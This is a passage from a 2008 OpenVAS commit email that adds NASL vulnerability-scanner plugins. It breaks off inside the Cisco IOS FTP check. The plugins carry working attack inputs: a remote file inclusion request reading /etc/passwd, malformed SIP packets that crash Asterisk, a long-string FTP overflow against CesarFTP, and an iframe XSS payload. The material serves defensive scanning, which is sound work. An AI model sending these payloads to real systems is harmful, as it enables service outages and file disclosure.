[Openvas-commits] r1210 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Fri Aug 22 16:09:15 CEST 2008
Author: jan
Date: 2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)
New Revision: 1210
Added:
trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl
trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl
trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl
trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl
trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl
trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl
trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl
trunk/openvas-plugins/scripts/cisco_vpn_client_priv_escalation.nasl
trunk/openvas-plugins/scripts/docebo_globals_overwrite.nasl
trunk/openvas-plugins/scripts/eyeos_command_execution.nasl
trunk/openvas-plugins/scripts/freesshd_key_exchange_overflow.nasl
trunk/openvas-plugins/scripts/goaheadwebserver_source_disclosure.nasl
trunk/openvas-plugins/scripts/kiwi_cattools_dir_traversal.nasl
trunk/openvas-plugins/scripts/mercur_imap_buffer_overflow.nasl
trunk/openvas-plugins/scripts/phpMyAgenda_30final_file_include.nasl
trunk/openvas-plugins/scripts/php_fusion_6_00_206_sql_injection.nasl
trunk/openvas-plugins/scripts/qk_smtp_server_dos.nasl
trunk/openvas-plugins/scripts/sip.inc
trunk/openvas-plugins/scripts/xhp_cms_file_upload.nasl
trunk/openvas-plugins/scripts/zeroblog_xss.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
* scripts/phpMyAgenda_30final_file_include.nasl,
scripts/goaheadwebserver_source_disclosure.nasl,
scripts/chipmunk_forum_xss.nasl,
scripts/mercur_imap_buffer_overflow.nasl,
scripts/php_fusion_6_00_206_sql_injection.nasl,
scripts/sip.inc,
scripts/cisco_ios_ftp_server_auth_bypass.nasl,
scripts/docebo_globals_overwrite.nasl,
scripts/freesshd_key_exchange_overflow.nasl,
scripts/qk_smtp_server_dos.nasl,
scripts/asterisk_sdp_header_overflow.nasl,
scripts/eyeos_command_execution.nasl,
scripts/aardvark_422_remote_file_include.nasl,
scripts/xhp_cms_file_upload.nasl,
scripts/asterisk_pbx_guest_access_enabled.nasl,
scripts/cesarftp_mkd_command_buffer_overflow.nasl,
scripts/cisco_vpn_client_priv_escalation.nasl,
scripts/kiwi_cattools_dir_traversal.nasl,
scripts/zeroblog_xss.nasl,
scripts/asterisk_null_pointer_dereference.nasl:
New. All implemented by Ferdy Riphagen <f.riphagen at nsec.nl>.
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/ChangeLog 2008-08-22 14:09:14 UTC (rev 1210)
@@ -1,3 +1,27 @@
+2008-08-22 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>
+
+ * scripts/phpMyAgenda_30final_file_include.nasl,
+ scripts/goaheadwebserver_source_disclosure.nasl,
+ scripts/chipmunk_forum_xss.nasl,
+ scripts/mercur_imap_buffer_overflow.nasl,
+ scripts/php_fusion_6_00_206_sql_injection.nasl,
+ scripts/sip.inc,
+ scripts/cisco_ios_ftp_server_auth_bypass.nasl,
+ scripts/docebo_globals_overwrite.nasl,
+ scripts/freesshd_key_exchange_overflow.nasl,
+ scripts/qk_smtp_server_dos.nasl,
+ scripts/asterisk_sdp_header_overflow.nasl,
+ scripts/eyeos_command_execution.nasl,
+ scripts/aardvark_422_remote_file_include.nasl,
+ scripts/xhp_cms_file_upload.nasl,
+ scripts/asterisk_pbx_guest_access_enabled.nasl,
+ scripts/cesarftp_mkd_command_buffer_overflow.nasl,
+ scripts/cisco_vpn_client_priv_escalation.nasl,
+ scripts/kiwi_cattools_dir_traversal.nasl,
+ scripts/zeroblog_xss.nasl,
+ scripts/asterisk_null_pointer_dereference.nasl:
+ New. All implemented by Ferdy Riphagen <f.riphagen at nsec.nl>.
+
2008-08-22 Vlatko Kosturjak <kost at linux.hr>
* scripts/slad_ssh.inc: Fix to correctly report port for SSH login,
Added: trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl
===================================================================
--- trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/aardvark_422_remote_file_include.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,96 @@
+#
+# Script Written By Ferdy Riphagen
+# <f[dot]riphagen[at]nsec[dot]nl>
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory / discovered by :
+# http://milw0rm.com/exploits/1732
+#
+
+if (description) {
+ script_id(200005);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2149");
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"25158");
+ }
+
+ name["english"] = "Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system contains a PHP application that is prone to
+remote file inclusions attacks.
+
+Description :
+
+Aardvark Topsites PHP is installed on the remote host. It is
+a open source Toplist management system written in PHP.
+
+The application does not sanitize user-supplied input to
+the 'CONFIG[PATH]' variable in some PHP files. This allows
+an attacker to include arbitrary files from remote systems, and
+execute them with privileges under which the webserver operates.
+
+The flaw is exploitable if PHP's 'register_globals' is set to on.
+
+See also :
+
+http://secunia.com/advisories/19911/
+http://www.aardvarktopsitesphp.com/forums/viewtopic.php?t=4301
+
+Solution :
+
+Disable PHP's 'register_globals' or upgrade to the latest release.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:H/Au:NR/C:P/A:P/I:P/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Checks for a file include in Aardvark Topsites less or equal to 4.2.2";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_ATTACK);
+ script_family(english:"CGI abuses");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+
+if (thorough_tests) dirs = make_list("/topsites", "/aardvarktopsites", cgi_dirs());
+else dirs = make_list(cgi_dirs());
+
+foreach dir (dirs) {
+ res = http_get_cache(item:string(dir, "/index.php"), port:port);
+ if(res == NULL) exit(0);
+
+ if (egrep(pattern:"Powered By <a href[^>]+>Aardvark Topsites PHP<", string:res)) {
+ uri = "FORM[url]=1&CONFIG[captcha]=1&CONFIG[path]=";
+ lfile = "/etc/passwd";
+
+ req = http_get(item:string(dir, "/sources/join.php?", uri, lfile, "%00"), port:port);
+ recv = http_keepalive_send_recv(data:req, port:port, bodyonly:TRUE);
+ display(recv);
+ if (recv == NULL) exit(0);
+
+ if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
+ egrep(pattern:"Warning.+main\(/etc/passwd\\0\/.+failed to open stream", string:recv)) {
+ security_warning(port);
+ exit(0);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_null_pointer_dereference.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,147 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Note:
+# Because of many systems using safe_asterisk to watchdog
+# the asterisk running process, this check could be
+# false negative prone.
+#
+
+if (description) {
+ script_id(9999991);
+ script_version("$Revision: 1.0 $");
+
+ name["english"] = "Asterisk PBX NULL Pointer Dereference Overflow";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The host contains an service that is prone to a remote buffer overflow.
+
+Description :
+
+The remote host appears to be runnning Asterisk PBX, an open-source
+telephone system.
+
+The application suffers from a null pointer dereference overflow in
+the SIP service. When sending an mailformed SIP packet with no URI and
+version in the request an attacker can trigger a Denial of Service and
+shutdown the application resulting in a loss of availability.
+
+See also :
+
+http://labs.musecurity.com/advisories/MU-200703-01.txt
+http://asterisk.org/node/48320
+http://asterisk.org/node/48319
+http://www.kb.cert.org/vuls/id/228032
+
+Solution :
+
+Upgrade to Asterisk PBX release 1.4.1 or 1.2.16.
+
+Risk factor :
+
+Medium / CVSS Base Score : 5
+(AV:R/AC:L/Au:NR/C:N/A:C/I:N/B:A)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Detect a null pointer dereference overflow in Asterisk PBX";
+ script_summary(english:summary["english"]);
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function get_sip_banner(port) {
+ local_var soc, r, opt, banner;
+ global_var port;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:user@", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ return NULL;
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+option = string(
+ "OPTIONS sip:user@", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user@", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+bad_register = string(
+ "REGISTER\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: User <sip:user@", get_host_name(), ":", port, ">\r\n",
+ "From: Nessus <sip:nessus@", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: Nessus <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Accept: application/sdp\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+banner = get_sip_banner(port:port);
+if ("Asterisk PBX" >!< banner) exit(0);
+
+exp = sip_send_recv(port:port, data:bad_register);
+if (isnull(exp)) {
+ res = sip_send_recv(port:port, data:option);
+ display(res);
+ if (isnull(res)) {
+ security_hole(port);
+ exit(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_pbx_guest_access_enabled.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,95 @@
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Fix by George A. Theall when the system answers the call.
+#
+
+if (description) {
+ script_id(9999993);
+ script_version("$Revision: 1.1 $");
+
+ name["english"] = "Asterisk PBX SIP Service Guest Access Enabled";
+ desc["english"] = "
+Synopsis :
+
+Asterisk PBX SIP service guest access is enabled.
+
+Description :
+
+Asterisk an open-source PBX is installed on the remote system.
+The SIP service is accepting SIP peers to use the proxy server
+as guest users. Unauthenticated users can use the proxy
+without supplying the required 'more secure' authentication.
+
+Guest access is enabled by default if 'allowguest=no' is not set
+in 'sip.conf'. Guest peers use the context defined under the
+general section and the restrictions set in the Asterisk config
+files.
+
+See also :
+
+http://www.voip-info.org/wiki/index.php?page=Asterisk+sip+allowguest
+
+Solution :
+
+If guest access is not needed, disable it by setting 'allowguest=no'
+in the sip.conf file.
+
+Risk factor :
+
+Medium / CVSS Base Score : 3.5
+(AV:R/AC:L/Au:NR/C:P/A:N/I:N/B:C)";
+ script_description(english:desc["english"]);
+ script_name(english:name["english"]);
+ summary["english"] = "Detect if it is possible for guest access to the Asterisk PBX SIP service";
+ script_summary(english:summary["english"]);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"General");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+if (islocalhost()) exit(0);
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+banner = get_kb_item(strcat("sip/banner/", port));
+if ("Asterisk PBX" >!< banner) exit(0);
+
+rpeer = string("NotExistingPeer", rand() %900 +100, "@");
+lpeer = string("Nessus", rand() %900 +100, "@");
+
+invite = string(
+ "INVITE sip:", rpeer, get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", rpeer, get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", lpeer, this_host(), ":", sport, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " INVITE\r\n",
+ "Contact: <sip:", lpeer, this_host(), ">\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+res = sip_send_recv(port:port, data:invite);
+if (isnull(res)) exit(0);
+
+if ("SIP/2.0 404 Not Found" >< res ||
+ ("SIP/2.0 100 Trying" >< res)) {
+ set_kb_item(name:"sip/guest_access/" + port, value:"yes");
+ security_warning(port);
+}
Added: trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/asterisk_sdp_header_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,172 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+# Note :
+# Because probably many systems running safe_asterisk
+# as a watchdog for the asterisk pid, this check could
+# be very false-negative prone. Additionaly an INVITE
+# message on secure systems need authentication, so this
+# only works on systems using 'allowguest=yes' in sip.conf
+# and for peers without authentication info with the use
+# of an edited 'logins.nasl' (not supplied).
+#
+
+if (description) {
+ script_id(9999992);
+ script_version("$Revision: 1.0 $");
+ script_bugtraq_id(23031);
+ script_cve_id("CVE-2007-1561");
+
+ name["english"] = "Asterisk PBX SDP Header Overflow Vulnerability";
+ desc["english"] = "
+Synopsis :
+
+The remote SIP server is affected by an overflow vulnerability.
+
+Description :
+
+A version of Asterisk PBX is running on the remote host. Asterisk is
+a complete open-source VoIP system.
+
+The application installed suffers from a remote overflow in the SIP service
+resulting in a denial of service. An attacker can send a malformed INVITE packet
+with two SDP headers, whitin the first header a existing IP address in the 'c=' variable
+and in the second SDP header a NOT existing IP address in 'c='.
+
+This results in a Segmentation fault in 'chan_sip.c' crashing the Asterisk PBX service.
+
+See also :
+
+http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/053052.html
+http://bugs.digium.com/view.php?id=9321
+
+Solution :
+
+Upgrade to Asterisk release 1.4.2/1.2.17 or newer.
+
+Risk factor : Medium
+
+Medium / CVSS Base Score : 5.0
+(AV:R/AC:L/Au:NR/C:N/A:C/I:N/B:A)";
+ script_description(english:desc["english"]);
+ script_name(english:name["english"]);
+ summary["english"] = "Trigger an SegFault in Atsterisk PBX by parsing a not existing IP in 'c='";
+ script_summary(english:summary["english"]);
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("sip_detection.nasl", "logins.nasl");
+ script_require_keys("Services/udp/sip");
+ exit(0);
+}
+
+function get_sip_banner(port) {
+ local_var soc, r, opt, banner;
+ global_var port;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ opt = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 10\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+ send(socket:soc, data:opt);
+ r = recv(socket:soc, length:1024);
+ if ("SIP/2.0" >< r && ("Server:" >< r)) {
+ banner = egrep(pattern:'^Server:', string:r);
+ banner = substr(banner, 8);
+ }
+
+ else if ("SIP/2.0" >< r && ("User-Agent" >< r)) {
+ banner = egrep(pattern:'^User-Agent', string:r);
+ banner = substr(banner, 12);
+ }
+
+ if (!isnull(banner)) return banner;
+ return NULL;
+}
+
+function sip_send_recv(port, data) {
+ local_var r, soc;
+ global_var port, data;
+
+ if (islocalhost()) soc = open_sock_udp(port);
+ else soc = open_priv_sock_udp(sport:5060, dport:port);
+ if (!soc) return NULL;
+
+ send(socket:soc, data:data);
+ r = recv(socket:soc, length:1024);
+ if (!isnull(r)) return r;
+ return NULL;
+}
+
+port = get_kb_item("Services/udp/sip");
+if (!port) port = 5060;
+
+# Authentication is not yet used.
+#if (!isnull(get_kb_item("sip/login"))) {
+# user = get_kb_item("sip/login") + "@";
+#}
+user = NULL;
+
+#if (!isnull(get_kb_item("sip/password"))) {
+# pass = get_kb_item("sip/password") + "@";
+#}
+pass = NULL;
+
+option = string(
+ "OPTIONS sip:", get_host_name(), " SIP/2.0", "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " OPTIONS\r\n",
+ "Contact: <sip:nessus@", this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Content-Length: 0\r\n\r\n");
+
+sdp_headers = string(
+ "v=0\r\n",
+ "o=somehost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
+ "c=IN IP4 ", get_host_name(), "\r\n",
+ "m=audio 16384 RTP/AVP 8 0 18 101\r\n\r\n",
+ "v=1\r\n",
+ "o=somehost 12345 12345 IN IP4 ", get_host_name(), "\r\n",
+ "c=IN IP4 555.x.555.x.555\r\n",
+ "m=audio 16384 RTP/AVP 8 0 18 101");
+
+bad_invite = string(
+ "INVITE sip:", get_host_name(), "\r\n",
+ "Via: SIP/2.0/UDP ", this_host(), ":", port, "\r\n",
+ "To: <sip:", get_host_name(), ":", port, ">\r\n",
+ "From: <sip:", user, this_host(), ":", port, ">\r\n",
+ "Call-ID: ", rand(), "\r\n",
+ "CSeq: ", rand(), " INVITE\r\n",
+ "Contact: <sip:", user, this_host(), ">\r\n",
+ "Max-Forwards: 0\r\n",
+ "Content-Type: application/sdp\r\n",
+ "Content-Length: ", strlen(sdp_headers), "\r\n\r\n",
+ sdp_headers);
+
+banner = get_sip_banner(port:port);
+if ("Asterisk PBX" >!< banner) exit(0);
+
+exp = sip_send_recv(port:port, data:bad_invite);
+if (isnull(exp)) {
+ res = sip_send_recv(port:port, data:option);
+ if (isnull(res)) {
+ security_warning(port);
+ exit(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cesarftp_mkd_command_buffer_overflow.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,120 @@
+#
+# Script Written By Ferdy Riphagen
+#
+# Script distributed under the GNU GPLv2 License.
+#
+# Original advisory:
+# http://www.securiteam.com/exploits/5AP0B2AIUY.html
+#
+
+if (description) {
+ script_id(200058);
+ script_version("$Revision: 1.0 $");
+
+ script_cve_id("CVE-2006-2961");
+ script_bugtraq_id(18586);
+ if (defined_func("script_xref")) {
+ script_xref(name:"OSVDB", value:"26364");
+ }
+
+ name["english"] = "CesarFTP MKD Command Buffer Overflow";
+ script_name(english:name["english"]);
+ desc["english"] = "
+Synopsis :
+
+The remote system is running CesarFTP server, which is
+vulnerable to a buffer overflow attack.
+
+Description :
+
+CesarFTP Server version <= 0.99g is prone to a buffer overflow
+attack when using some ftp command followed with a long string
+of arguments.
+
+The system could crash, and accepts/execute arbitrary commands
+after the initial overflow attack.
+
+Note that the service runs with LOCAL SYSTEM privileges on the
+remote host, which means that an attacker can possible gain complete
+control over the system.
+
+To use the flaw an attacker needs access to the requested FTP server,
+by using a valid account/password or if activated the anonymous account.
+
+See Also :
+
+http://secunia.com/advisories/20574/
+
+Solution :
+
+At time of writing there is no update available.
+Filter access to the FTP service, so that it can be used by trusted
+sources only.
+
+Risk factor :
+
+Medium / CVSS Base Score : 6
+(AV:R/AC:L/Au:R/C:C/A:C/I:C/B:N)";
+ script_description(english:desc["english"]);
+ summary["english"] = "Detect a buffer overflow in CesarFTP server via a long MKD string";
+ script_summary(english:summary["english"]);
+
+ script_category(ACT_DENIAL);
+ script_family(english:"Denial of Service");
+ script_copyright(english:"This script is Copyright (C) 2006 Ferdy Riphagen");
+
+ script_dependencies("find_service.nes, ftp_anonymous.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+include("global_settings.inc");
+
+port = get_kb_item("Services/ftp");
+if (!port) port = 21;
+if (!get_port_state(port)) exit(0);
+
+soc = open_sock_tcp(port);
+if (soc) {
+
+ # Use the 'HELP' command for version info
+ ftp_send_cmd(socket:soc, cmd:"HELP");
+ banner = recv(socket:soc, length:1024);
+
+if (!banner || ("CesarFTP server" >!< banner)) exit(0);
+ user = get_kb_item("ftp/login");
+ pass = get_kb_item("ftp/password");
+
+ if (!user) {
+ if (get_kb_item("ftp/anonymous")) {
+ user = "anonymous";
+ pass = "anonymous at anonymous.xx";
+ }
+ else exit(0);
+ }
+
+ if (!ftp_authenticate(socket:soc, user:user, pass:pass)) exit(0);
+
+ # Note:
+ # The original advisory is made for the MKD command. But at least
+ # the APPE, DELE, RMD, LIST, CWD, RETR commands are also vulnerable
+ # to the same stack overflow.
+
+ ftpcmd = "MKD";
+ buff = string(ftpcmd, raw_string(0x20), crap(data:raw_string(0x0A), length:700), "\r\n");
+ send = send(socket:soc, data:buff);
+
+ recv = recv(socket:soc, length:1024);
+ close(soc);
+
+ soc = open_sock_tcp(port);
+ if (soc) {
+ line = ftp_recv_line(socket:soc, retry:2);
+ }
+ if (!soc || (!strlen(line))) {
+ security_warning(port);
+ }
+ if (soc) close(soc);
+}
+
Added: trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl
===================================================================
--- trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/chipmunk_forum_xss.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,94 @@
+#
+# Script Written By Ferdy Riphagen
+# <f(dot)riphagen(at)nsec(dot)nl>
+#
+# This script is released under the GNU GPLv2
+#
+
+if (description) {
+script_id(200004);
+script_version("$Revision: 1.0 $");
+
+script_bugtraq_id(15149);
+
+name["english"] = "Chipmunk Forum <= 1.3 Cross-Site Scripting Vulnerability";
+
+script_name(english:name["english"]);
+
+desc["english"] = "
+Synopsis :
+
+The remote host contains a PHP script that is vulnerable to cross-site
+scripting attacks.
+
+Description :
+
+The remote host appears to be running Chipmunk Forum.
+
+A vulnerability was identified in Chipmunk Forum version 1.3 and prior, which may be exploited by
+remote attackers to execute script code by the user's browser.
+
+See also :
+
+http://www.frsirt.com/english/advisories/2005/2172
+
+Solution :
+
+Unknown at this time.
+
+Risk factor :
+
+Low";
+script_description(english:desc["english"]);
+
+summary["english"] = "Check if Chipmunk is vulnerable to cross-site scripting attacks.";
+script_summary(english:summary["english"]);
+
+script_category(ACT_GATHER_INFO);
+script_family(english:"CGI abuses : XSS");
+
+script_copyright(english:"This script is Copyright (C) 2005 Ferdy Riphagen");
+
+script_dependencie("http_version.nasl");
+script_require_ports("Services/www", 80);
+
+exit(0);
+}
+
+include("http_func.inc");
+include("http_keepalive.inc");
+include("global_settings.inc");
+include("url_func.inc");
+
+port = get_http_port(default:80);
+if (!get_port_state(port)) exit(0);
+if (!can_host_php(port:port)) exit(0);
+if (get_kb_item("www/", port, "/generic_xss")) exit(0);
+
+xss = "'</a><IFRAME SRC=javascript:alert(%27XSS%20DETECTED%20BY%20NESSUS%27)></IFRAME>";
+exss = urlencode(str:xss);
+
+#if (thorough_tests) dirs = make_list("/board", "/forum", "/", cgi_dirs());
+#else dirs = make_list(cgi_dirs());
+
+dirs = make_list("/chipmunk");
+
+foreach dir (dirs)
+{
+ res = http_get_cache(item:string(dir, "/index.php"), port:port);
+ if (res == NULL) exit(0);
+
+ if (egrep(pattern:">Powered by © <A href=[^>]+>Chipmunk Board<", string:res))
+ {
+ req = http_get(item:string(dir, "/index.php?forumID=", exss), port:port);
+
+ recv = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
+ if(recv == NULL)exit(0);
+
+ if(xss >< recv)
+ {
+ security_note(port);
+ exit(0);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl 2008-08-22 13:14:50 UTC (rev 1209)
+++ trunk/openvas-plugins/scripts/cisco_ios_ftp_server_auth_bypass.nasl 2008-08-22 14:09:14 UTC (rev 1210)
@@ -0,0 +1,114 @@
+#
+# Script Written By Ferdy Riphagen
+# Script distributed under the GNU GPLv2 License.
+#
+
+desc = "
+Synopsis :
+
+The Cisco IOS FTP server is enabled on the remote system.
+
+Description :
+
+The FTP server does not properly verify authentication, allowing
+for anonymous access to the file system. An attacker could use
+the ftp server to view/download confidential configuration files, or upload
+replacements which will be used at startup.
+
+See also :
+
+http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml
+
+Solution :
+
+Disable the FTP Server by using 'no ftp-server enable'
+or upgrade to a newer release (see cisco-sa-20070509-iosftp).
+
+Risk factor :
+
+High / CVSS Base Score : 8.5
+(AV:R/AC:L/Au:NR/C:C/A:P/I:P/B:C)";
+script_description(english:desc);
+
+if (description) {
+ script_id(9999996);
+ script_version("$Revision: 1.0 $");
+ script_cve_id("CVE-2007-2586");
+ script_bugtraq_id(23885);
+
+ name = "Cisco IOS FTP Server Authentication Bypass Vulnerability";
+ script_name(english:name);
+ summary = "Checks for Cisco IOS FTP server authentication bypass";
+ script_summary(english:summary);
+ script_category(ACT_GATHER_INFO);
+ script_family(english:"FTP");
+ script_copyright(english:"This script is Copyright (C) 2007 Ferdy Riphagen");
+
+ script_dependencies("ftp_anonymous.nasl");
+ script_require_ports("Services/FTP", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+
+#if (!get_kb_item("ftp/anonymous")) exit(0);
+port = get_kb_item("Services/ftp");
+if (!port) port = 21;
+if (!get_port_state(port)) exit(0);
+
+function start_passive() {
+ pasv = ftp_pasv(socket:soc);
+ if (!pasv) return NULL;
+ soc2 = open_sock_tcp(pasv, transport:get_port_transport(port));
+ if (!soc2) return NULL;
+ return;
+}
+
+banner = get_ftp_banner(port:port);
+if ("IOS-FTP server" >!< banner) exit(0);
+
+# Try to get some directory listing.
+# On the other hand ftp_anonymous.nasl is doing this too :-)
+soc = open_sock_tcp(port);
+if (soc &&
+ (ftp_authenticate(socket:soc, user:"blah", pass:"blah"))) {
